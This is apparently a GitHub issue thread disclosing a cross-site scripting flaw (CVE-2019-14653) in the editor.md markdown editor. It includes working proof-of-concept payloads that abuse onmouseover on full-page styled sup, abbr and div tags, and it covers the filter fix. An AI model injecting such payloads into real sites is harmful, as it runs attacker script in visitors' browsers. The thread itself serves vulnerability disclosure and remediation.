XSS vulnerability on <abbr> and <sup>.

pandao / editor.md

The open source embeddable online markdown editor (component).

http://editor.md.ipandao.com/

MIT License

13.82k stars 2.42k forks source link

XSS vulnerability on <abbr> and <sup>. #715

Open Ry0taK opened 5 years ago

Ry0taK commented 5 years ago

Summary

Because there are no attribute filters in the abbr andsup tags, an attacker can trigger XSS on websites which is using editor.md.

CVE

CVE-2019-14653

Payloads

This will execute JavaScript when you move the mouse on any part of the page.

<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('sup')">sup</sup>
<abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('abbr')">abbr</abbr>

Images

BedRemka commented 5 years ago

^sup abbr

huntr-helper commented 4 years ago

👋 Hey! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev!

alromh87 commented 4 years ago

Hello while bug bounting this issue, I noticed the filter is implemented, you should use

htmlDecode : "|on*"

while starting editor, this should be preferred method, that way it protects against code injection in all elements, like divs, img, ...., not just abbr & sup

XSS can also be achived with many more elements:

<div style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('div')">div</div>

sent PR updating README to make it clear

fluix-dev commented 4 years ago

Is there anything else that needs to be done? The PR seems to have been merged.

alromh87 commented 4 years ago

I think this can be closed

alromh87 commented 4 years ago

After looking deeper I realized filter is inefective for self clossing tags, will look into it

alromh87 commented 4 years ago

Should work properly now